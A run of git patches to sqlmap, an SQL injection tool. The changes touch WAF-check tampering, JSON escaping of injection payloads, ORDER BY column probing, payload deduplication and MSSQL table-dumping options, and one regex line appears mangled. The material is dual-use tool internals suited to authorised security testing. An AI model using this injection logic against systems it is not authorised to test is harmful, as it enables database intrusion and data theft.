-4130d34ca6a37e8944dfdf0b94643235 lib/core/settings.py +16bc4ff0ccd5121f1b90016b5d759ef6 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py @@ -224,7 +224,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ 4eaeef94314956e4517e5310a28d579a sqlmapapi.py -ecbd0edbb6ea4cb6e1277ceb294d7819 sqlmap.py +5d1d27e7237584c4499ee9a3e698e384 sqlmap.py 4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py d7e9a979eff4d7315d804a181e66fc93 tamper/appendnullbyte.py From a8cb14ed4a4936524271e457e5daa5e32a481de0 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 11 Apr 2018 14:48:54 +0200 Subject: [PATCH 113/428] Minor patch (disable tamper script usage in WAF/IDS/IPS check phase) --- lib/controller/checks.py | 2 +- lib/core/settings.py | 2 +- lib/request/connect.py | 4 ++-- txt/checksum.md5 | 6 +++--- 4 files changed, 7 insertions(+), 7 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 7b2a97fa3b3..9f0868fec17 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1359,7 +1359,7 @@ def checkWaf(): conf.timeout = IDS_WAF_CHECK_TIMEOUT try: - retVal = Request.queryPage(place=place, value=value, getRatioValue=True, noteResponseTime=False, silent=True)[1] < IDS_WAF_CHECK_RATIO + retVal = Request.queryPage(place=place, value=value, getRatioValue=True, noteResponseTime=False, silent=True, disableTampering=True)[1] < IDS_WAF_CHECK_RATIO except SqlmapConnectionException: retVal = True finally: diff --git a/lib/core/settings.py b/lib/core/settings.py index cc1ec7e1744..648531af886 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.12" +VERSION = "1.2.4.13" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index 358fa22b416..1c83c5ce7f5 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -770,7 +770,7 @@ class _(dict): @staticmethod @stackedmethod - def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True): + def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True, disableTampering=False): """ This method calls a function to get the target URL page content and returns its page ratio (0 <= ratio <= 1) or a boolean value @@ -817,7 +817,7 @@ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent conf.httpHeaders.append((HTTP_HEADER.CONTENT_TYPE, contentType)) if payload: - if kb.tamperFunctions: + if not disableTampering and kb.tamperFunctions: for function in kb.tamperFunctions: try: payload = function(payload=payload, headers=auxHeaders) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index cb3b7f41707..f45269e14e1 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,7 +21,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -5084b16b037ed8d29f594f6113fe78e3 lib/controller/checks.py +56d325f83671146c28ac300ff553420f lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -46,7 +46,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -16bc4ff0ccd5121f1b90016b5d759ef6 lib/core/settings.py +8a247c468eef23045b8537d4ff98d823 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py @@ -68,7 +68,7 @@ ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 7e8e0a3fdebbe443832c1bab2f8d3869 lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -18052b8924b77eb2e772350b262aae88 lib/request/connect.py +1865164621eb94c9c231006765065c17 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py From 148d1c9ff9ecbbb455ae0f4b31b833fca167b21e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 11 Apr 2018 15:19:44 +0200 Subject: [PATCH 114/428] Fixes #3037 --- lib/core/common.py | 17 +++++++++++++++++ lib/core/settings.py | 2 +- lib/request/connect.py | 11 +++-------- txt/checksum.md5 | 6 +++--- 4 files changed, 24 insertions(+), 12 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 2908bc26057..7ce13952b04 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1493,6 +1493,23 @@ def parseTargetUrl(): if conf.url != originalUrl: kb.originalUrls[conf.url] = originalUrl +def escapeJsonValue(value): + """ + Escapes JSON value (used in payloads) + + # Reference: https://stackoverflow.com/a/16652683 + """ + + retVal = "" + + for char in value: + if char < ' ' or char == '"': + retVal += json.dumps(char)[1:-1] + else: + retVal += char + + return retVal + def expandAsteriskForColumns(expression): """ If the user provided an asterisk rather than the column(s) diff --git a/lib/core/settings.py b/lib/core/settings.py index 648531af886..918b363a755 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.13" +VERSION = "1.2.4.14" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index 1c83c5ce7f5..78523236497 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -34,6 +34,7 @@ class WebSocketException(Exception): from lib.core.common import checkSameHost from lib.core.common import clearConsoleLine from lib.core.common import dataToStdout +from lib.core.common import escapeJsonValue from lib.core.common import evaluateCode from lib.core.common import extractRegexResult from lib.core.common import findMultipartPostBoundary @@ -841,16 +842,10 @@ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent # with their HTML encoded counterparts payload = payload.replace('>', ">").replace('<', "<") elif kb.postHint == POST_HINT.JSON: - if payload.startswith('"') and payload.endswith('"'): - payload = json.dumps(payload[1:-1]) - else: - payload = json.dumps(payload)[1:-1] + payload = escapeJsonValue(payload) elif kb.postHint == POST_HINT.JSON_LIKE: payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"') - if payload.startswith('"') and payload.endswith('"'): - payload = json.dumps(payload[1:-1]) - else: - payload = json.dumps(payload)[1:-1] + payload = escapeJsonValue(payload) payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"') value = agent.replacePayload(value, payload) else: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f45269e14e1..17b0036faa6 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -27,7 +27,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py b1990c7805943f0c973a853bba981d96 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -31cd0692a626da935b1cac8f2cfba25a lib/core/common.py +7f97f69794a24670ccba1bb531815433 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -46,7 +46,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -8a247c468eef23045b8537d4ff98d823 lib/core/settings.py +2d6842f03c9916a90467f9720ebb35b0 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py @@ -68,7 +68,7 @@ ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 7e8e0a3fdebbe443832c1bab2f8d3869 lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -1865164621eb94c9c231006765065c17 lib/request/connect.py +e2b40b94446d59fb25abe68c429bae74 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py From 29e683fb5bd5a921700ae5a6932823978644002b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 12 Apr 2018 11:33:23 +0200 Subject: [PATCH 115/428] Skip prepending CR to readInput messages if in non-TTY mode (ugly looking in Linux text editors) --- lib/core/common.py | 9 ++++++--- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 9 insertions(+), 6 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 7ce13952b04..695ab669672 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1015,8 +1015,11 @@ def readInput(message, default=None, checkBatch=True, boolean=False): elif answer is None and retVal: retVal = "%s,%s" % (retVal, getUnicode(item, UNICODE_ENCODING)) + if message and getattr(LOGGER_HANDLER, "is_tty", False): + message = "\r%s" % message + if retVal: - dataToStdout("\r%s%s\n" % (message, retVal), forceOutput=not kb.wizardMode, bold=True) + dataToStdout("%s%s\n" % (message, retVal), forceOutput=not kb.wizardMode, bold=True) debugMsg = "used the given answer" logger.debug(debugMsg) @@ -1030,7 +1033,7 @@ def readInput(message, default=None, checkBatch=True, boolean=False): else: options = unicode() - dataToStdout("\r%s%s\n" % (message, options), forceOutput=not kb.wizardMode, bold=True) + dataToStdout("%s%s\n" % (message, options), forceOutput=not kb.wizardMode, bold=True) debugMsg = "used the default behavior, running in batch mode" logger.debug(debugMsg) @@ -1043,7 +1046,7 @@ def readInput(message, default=None, checkBatch=True, boolean=False): if conf.get("beep"): beep() - dataToStdout("\r%s" % message, forceOutput=not kb.wizardMode, bold=True) + dataToStdout("%s" % message, forceOutput=not kb.wizardMode, bold=True) kb.prependFlag = False retVal = raw_input().strip() or default diff --git a/lib/core/settings.py b/lib/core/settings.py index 918b363a755..5da90e1dd20 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.14" +VERSION = "1.2.4.15" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 17b0036faa6..303f31cad3f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -27,7 +27,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py b1990c7805943f0c973a853bba981d96 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -7f97f69794a24670ccba1bb531815433 lib/core/common.py +9e88889d6fd9cb9a17e467b72ec30305 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -46,7 +46,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -2d6842f03c9916a90467f9720ebb35b0 lib/core/settings.py +e22083ec5717d91e68a18bf73ebcc628 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py From 60767de2eb9645001c6559dc2cd2680f06de6159 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 12 Apr 2018 12:25:37 +0200 Subject: [PATCH 116/428] Patching issue that got into with patch for #2934 (ORDER BY was unusable in majority of regular cases) --- lib/core/settings.py | 2 +- lib/techniques/union/test.py | 4 ++-- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 5da90e1dd20..bcc427d5792 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.15" +VERSION = "1.2.4.16" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py index 7a63bc37f1f..6d94cb875b4 100644 --- a/lib/techniques/union/test.py +++ b/lib/techniques/union/test.py @@ -50,7 +50,7 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where= retVal = None @stackedmethod - def _orderByTechnique(lowerCount, upperCount): + def _orderByTechnique(lowerCount=None, upperCount=None): def _orderByTest(cols): query = agent.prefixQuery("ORDER BY %d" % cols, prefix=prefix) query = agent.suffixQuery(query, suffix=suffix, comment=comment) @@ -91,7 +91,7 @@ def _orderByTest(cols): lowerCount, upperCount = conf.uColsStart, conf.uColsStop if lowerCount == 1 or conf.uCols: - found = kb.orderByColumns or _orderByTechnique(lowerCount, upperCount) + found = kb.orderByColumns or (_orderByTechnique(lowerCount, upperCount) if conf.uCols else _orderByTechnique()) if found: kb.orderByColumns = found infoMsg = "target URL appears to have %d column%s in query" % (found, 's' if found > 1 else "") diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 303f31cad3f..0bc9ebc115d 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -e22083ec5717d91e68a18bf73ebcc628 lib/core/settings.py +f01ac839011009e7c219fc11f528f348 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py @@ -96,7 +96,7 @@ f1decf0a987bd3a4bc757212cbe6a6c8 lib/takeover/xp_cmdshell.py f999f2e88dea9ac8831eb2f468478b5f lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py -cbe59feb11526068bbbd35dca97b3b37 lib/techniques/union/test.py +a36be917cf86a5ee407c83d74567f324 lib/techniques/union/test.py 11ecf2effbe9f40b361843d546c3c521 lib/techniques/union/use.py c552f8d924d962a26f2ded250bcea3b8 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py From 8ca3287df4706630d1de5e1520fe1e8bc963e558 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 12 Apr 2018 14:38:32 +0200 Subject: [PATCH 117/428] Proper way to skip already used payloads (important to --suffix/--prefix cases) --- lib/controller/checks.py | 6 ++++-- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 5 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 9f0868fec17..b0b42b5036e 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -454,11 +454,13 @@ def checkSqlInjection(place, parameter, value): boundPayload = agent.prefixQuery(fstPayload, prefix, where, clause) boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where) reqPayload = agent.payload(place, parameter, newValue=boundPayload, where=where) + if reqPayload: - if reqPayload in seenPayload: + stripPayload = re.sub(r"(\A|\b|_)([A-Za-z]{4}((?.\g<4>", reqPayload) + if stripPayload in seenPayload: continue else: - seenPayload.add(reqPayload) + seenPayload.add(stripPayload) else: reqPayload = None diff --git a/lib/core/settings.py b/lib/core/settings.py index bcc427d5792..e0b1400e254 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.16" +VERSION = "1.2.4.17" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 0bc9ebc115d..9d29b63288e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,7 +21,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -56d325f83671146c28ac300ff553420f lib/controller/checks.py +d9559f6c5053a7ccb524f3dd049e35f8 lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -46,7 +46,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -f01ac839011009e7c219fc11f528f348 lib/core/settings.py +e854bd3a7ce6196a3ee3e3891473435e lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py From 509bb41b06114d6d953dfaa6ac82c9dad9bc3253 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 17 Apr 2018 17:08:57 +0200 Subject: [PATCH 118/428] Adding (hidden) switch '--force-pivoting' (Issue #3032) --- lib/core/settings.py | 2 +- lib/parse/cmdline.py | 3 +++ plugins/generic/entries.py | 13 +++++++++++-- txt/checksum.md5 | 6 +++--- 4 files changed, 18 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index e0b1400e254..13a6c742ea2 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.17" +VERSION = "1.2.4.18" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 3794d3ac231..2631a7b046d 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -683,6 +683,9 @@ def cmdLineParser(argv=None): parser.add_option("--force-dns", dest="forceDns", action="store_true", help=SUPPRESS_HELP) + parser.add_option("--force-pivoting", dest="forcePivoting", action="store_true", + help=SUPPRESS_HELP) + parser.add_option("--force-threads", dest="forceThreads", action="store_true", help=SUPPRESS_HELP) diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py index b5638c4096a..abf2003bbb5 100644 --- a/plugins/generic/entries.py +++ b/plugins/generic/entries.py @@ -23,6 +23,7 @@ from lib.core.common import readInput from lib.core.common import safeSQLIdentificatorNaming from lib.core.common import singleTimeLogMessage +from lib.core.common import singleTimeWarnMessage from lib.core.common import unArrayizeValue from lib.core.common import unsafeSQLIdentificatorNaming from lib.core.data import conf @@ -184,7 +185,11 @@ def dumpTable(self, foundData=None): if not (isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL): table = "%s.%s" % (conf.db, tbl) - if Backend.isDbms(DBMS.MSSQL): + if Backend.isDbms(DBMS.MSSQL) and not conf.forcePivoting: + warnMsg = "in case of table dumping problems (e.g. column entry order) " + warnMsg += "you are advised to rerun with '--force-pivoting'" + singleTimeWarnMessage(warnMsg) + query = rootQuery.blind.count % table query = agent.whereQuery(query) @@ -327,7 +332,11 @@ def dumpTable(self, foundData=None): elif Backend.isDbms(DBMS.INFORMIX): table = "%s:%s" % (conf.db, tbl) - if Backend.isDbms(DBMS.MSSQL): + if Backend.isDbms(DBMS.MSSQL) and not conf.forcePivoting: + warnMsg = "in case of table dumping problems (e.g. column entry order) " + warnMsg += "you are advised to rerun with '--force-pivoting'" + singleTimeWarnMessage(warnMsg) + try: indexRange = getLimitRange(count, plusOne=True) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9d29b63288e..2bfe4a58a0e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -e854bd3a7ce6196a3ee3e3891473435e lib/core/settings.py +13d487ed576734ef3178720ec98ec406 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py @@ -57,7 +57,7 @@ af2d1810b6a7ebc61689a53c253ddbaa lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -f667710f17b8447358ee7508a9d2faf1 lib/parse/cmdline.py +5e46fac7f824ba8ab8003a1cd47d8af3 lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py aaad2a0d80f05eaebe52c71519b3dfc7 lib/parse/headers.py @@ -204,7 +204,7 @@ a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py 34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py e6cd1c5a5244d83396b401f7db43d323 plugins/generic/custom.py 79c6dbcb7e6ad5e993a44aa52fdc36ed plugins/generic/databases.py -a9c8637f0526d751cd1a6a18f91967f5 plugins/generic/entries.py +4e2b366bb9cfdaaed719b219913357c6 plugins/generic/entries.py d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py 0c8abe66a78edca0660bfb8049d109e2 plugins/generic/filesystem.py f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py From 1822cc05f68c2d1b3135bbf52a60056894f24b84 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 22 Apr 2018 01:12:56 +0200 Subject: [PATCH 119/428] Patch for #3060 --- lib/core/settings.py | 2 +- lib/request/basic.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 13a6c742ea2..08ee02c09b3 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.18" +VERSION = "1.2.4.19" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/basic.py b/lib/request/basic.py index 6e82b2da1cf..1fe7fd8d3cf 100644 --- a/lib/request/basic.py +++ b/lib/request/basic.py @@ -334,7 +334,7 @@ def decodePage(page, contentEncoding, contentType): kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page)) - if kb.pageEncoding and kb.pageEncoding.lower() == "utf-8-sig": + if (kb.pageEncoding or "").lower() == "utf-8-sig": kb.pageEncoding = "utf-8" if page and page.startswith("\xef\xbb\xbf"): # Reference: https://docs.python.org/2/library/codecs.html (Note: noticed problems when "utf-8-sig" is left to Python for handling) page = page[3:] diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 2bfe4a58a0e..a3ffdc22a23 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -13d487ed576734ef3178720ec98ec406 lib/core/settings.py +50e82ed2cd620854ce6e74cf18781117 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py @@ -66,7 +66,7 @@ aaad2a0d80f05eaebe52c71519b3dfc7 lib/parse/headers.py ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py -7e8e0a3fdebbe443832c1bab2f8d3869 lib/request/basic.py +596988f14408cde1a2d3b5c9f231873a lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py e2b40b94446d59fb25abe68c429bae74 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py From 3fde205cd467542ffa6e34a10e415e77021cc83b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 24 Apr 2018 19:45:53 +0200 Subject: [PATCH 120/428] Generic patch for #2886 (cause still unknown) --- lib/core/settings.py | 2 +- lib/request/connect.py | 4 +++- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 08ee02c09b3..9ff6ff24319 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.19" +VERSION = "1.2.4.20" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index 78523236497..92c3f3509a0 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -430,8 +430,10 @@ class _(dict): method = unicodeencode(method) req = MethodRequest(url, post, headers) req.set_method(method) - else: + elif url is not None: req = urllib2.Request(url, post, headers) + else: + return None, None, None requestHeaders += 